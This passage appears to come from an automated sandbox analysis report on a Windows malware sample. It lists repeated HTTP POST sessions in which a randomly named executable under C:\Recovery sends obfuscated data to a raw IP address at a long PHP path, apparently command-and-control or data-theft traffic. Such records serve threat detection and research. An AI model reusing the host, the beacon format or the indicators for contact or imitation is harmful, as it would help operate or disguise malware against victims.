                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          37192.168.2.849771147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:06.845585108 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:07.238975048 CET2512OUTData Raw: 52 5c 5f 5e 5e 58 55 51 58 57 5a 57 52 56 51 57 5b 51 5d 46 57 5e 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_^^XUQXWZWRVQW[Q]FW^PZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z1?0\ :!=Z*>?\' Y$\8U"=)+ );%[#7\.9.\%!Z+(
                                                                                          Dec 10, 2024 07:29:08.105334997 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:08.340827942 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          38192.168.2.849777147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:08.619940996 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:08.978048086 CET2512OUTData Raw: 57 5d 5a 5d 5b 58 55 5b 58 57 5a 57 52 54 51 55 5b 5c 5d 47 57 5f 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W]Z][XU[XWZWRTQU[\]GW_PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&/#\=55[=-/[$? X3?!!\?)!^71#Z9.\%!Z+
                                                                                          Dec 10, 2024 07:29:09.847959042 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:10.080960989 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          39192.168.2.849778147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:09.438215017 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1984
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:09.821811914 CET1984OUTData Raw: 57 5c 5a 59 5e 5f 55 50 58 57 5a 57 52 51 51 55 5b 51 5d 42 57 5e 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\ZY^_UPXWZWRQQU[Q]BW^PY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2 !*55=^). $%*76=%\+;3+89_#2?]:.\%!Z+4
                                                                                          Dec 10, 2024 07:29:10.699578047 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:10.932754993 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 34 39 37 59 25 1d 20 53 38 08 3b 1d 25 03 3f 40 3e 0c 32 16 25 28 30 04 2c 21 27 1c 2a 04 21 5c 3c 03 2b 0f 29 06 3c 0e 24 35 21 46 0c 1d 24 14 30 5d 2e 16 24 3e 3b 5c 30 11 27 1d 33 22 11 58 2b 33 38 1b 20 20 30 05 24 23 28 1f 3b 13 08 54 38 25 2d 18 29 32 31 0d 31 12 22 57 0d 12 24 08 31 20 2e 00 22 32 36 55 22 0f 2b 0d 3c 35 30 5c 27 10 3b 5d 36 3a 25 10 24 57 24 5a 20 09 0a 12 2b 3b 3e 59 31 2d 0c 1a 27 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%497Y% S8;%?@>2%(0,!'*!\<+)<$5!F$0].$>;\0'3"X+38 0$#(;T8%-)211"W$1 ."26U"+<50\';]6:%$W$Z +;>Y1-' ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          40192.168.2.849784147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:10.718317032 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:11.069745064 CET2512OUTData Raw: 57 59 5a 5a 5e 58 50 5a 58 57 5a 57 52 53 51 57 5b 58 5d 41 57 54 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WYZZ^XPZXWZWRSQW[X]AWTPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%Y0^4*"U66)-+$/3 U".1(^3) ;\9.\%!Z+<
                                                                                          Dec 10, 2024 07:29:11.984668970 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:12.216844082 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          41192.168.2.849785147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:12.477255106 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:13.028445005 CET2512OUTData Raw: 52 5b 5a 59 5b 5e 55 5b 58 57 5a 57 52 57 51 53 5b 58 5d 41 57 54 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[ZY[^U[XWZWRWQS[X]AWTP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2/7\:P!65X>Z3?33 V =!Y);$R)7#\..\%!Z+,
                                                                                          Dec 10, 2024 07:29:13.739509106 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:13.972685099 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          42192.168.2.849791147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:14.247911930 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:14.600766897 CET2512OUTData Raw: 52 5d 5a 58 5e 5b 55 5a 58 57 5a 57 52 50 51 5c 5b 5d 5d 41 57 53 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]ZX^[UZXWZWRPQ\[]]AWSPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"1(#:"51)>/^34$* .:<;,*]6!!;X9.\%!Z+0
                                                                                          Dec 10, 2024 07:29:15.509708881 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:15.794023037 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:29:15.990281105 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          43192.168.2.849797147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:16.244596958 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:16.600753069 CET2512OUTData Raw: 57 5f 5f 53 5b 59 55 5f 58 57 5a 57 52 53 51 52 5b 5b 5d 45 57 55 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__S[YU_XWZWRSQR[[]EWUPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_'<74))!6=Y=00+3\#6=\? =;!428..\%!Z+<
                                                                                          Dec 10, 2024 07:29:17.505887032 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:17.743743896 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          44192.168.2.849803147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:17.986052036 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:18.547487020 CET2512OUTData Raw: 57 5b 5a 58 5b 5b 55 5c 58 57 5a 57 52 51 51 52 5b 5c 5d 45 57 5f 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[ZX[[U\XWZWRQQR[\]EW_P_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"]&,<^#\6U5P5)<%/4^35)8++(!X!":).\%!Z+4
                                                                                          Dec 10, 2024 07:29:19.249823093 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:19.489058971 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          45192.168.2.849807147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:19.736645937 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:20.085167885 CET2512OUTData Raw: 52 5a 5f 5f 5b 5e 50 5c 58 57 5a 57 52 5c 51 5c 5b 5e 5d 43 57 52 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RZ__[^P\XWZWR\Q\[^]CWRP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!14 9>T6%:(.7^0,<0T"](,+;" 17[.9.\%!Z+
                                                                                          Dec 10, 2024 07:29:21.006457090 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:21.241146088 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          46192.168.2.849810147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:21.730703115 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:22.117626905 CET2004OUTData Raw: 57 5c 5f 5c 5e 5e 50 59 58 57 5a 57 52 51 51 52 5b 51 5d 41 57 52 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\_\^^PYXWZWRQQR[Q]AWRPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z&?_7\%6%Y>><0,$^30T5=!X+8+=]=^#.9.\%!Z+4
                                                                                          Dec 10, 2024 07:29:22.991971970 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:23.224808931 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 37 07 05 5a 26 0a 30 53 2f 32 38 0f 26 2d 3b 45 3d 0b 26 58 31 06 30 07 3a 32 3b 1f 2a 3e 32 04 28 29 2f 0d 29 01 30 0c 24 35 21 46 0c 1d 27 01 27 05 26 1b 27 2d 3b 59 24 59 3f 10 30 1c 37 59 2b 20 24 19 23 0d 2f 5a 30 0a 3c 56 2f 2d 07 0f 2c 43 21 1a 2a 0b 36 57 31 12 22 57 0d 12 27 54 32 09 25 1c 20 22 22 1e 36 31 2c 56 2b 1b 3b 05 27 10 3f 12 23 3a 1b 5b 24 08 38 59 20 27 0a 1c 3f 05 3e 13 24 2e 31 0b 30 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%7Z&0S/28&-;E=&X10:2;*>2()/)0$5!F''&'-;Y$Y?07Y+ $#/Z0<V/-,C!*6W1"W'T2% ""61,V+;'?#:[$8Y '?>$.10; ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          47192.168.2.849811147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:21.856769085 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:22.210347891 CET2512OUTData Raw: 52 5c 5a 59 5e 55 55 59 58 57 5a 57 52 52 51 54 5b 5a 5d 40 57 5e 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\ZY^UUYXWZWRRQT[Z]@W^P]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&]#*)"&=^*><'<8X'*("2??>;*#T'Y9.\%!Z+
                                                                                          Dec 10, 2024 07:29:23.117686033 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:23.352566957 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          48192.168.2.849817147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:23.649945974 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:24.199496031 CET2512OUTData Raw: 52 5d 5f 5e 5e 5a 55 59 58 57 5a 57 52 50 51 56 5b 5a 5d 48 57 55 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]_^^ZUYXWZWRPQV[Z]HWUP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!'<##*!^)>'^$/]$4U!>Y+($R=Z#"X99.\%!Z+0
                                                                                          Dec 10, 2024 07:29:24.886307955 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:25.120743990 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          49192.168.2.849823147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:25.407135963 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
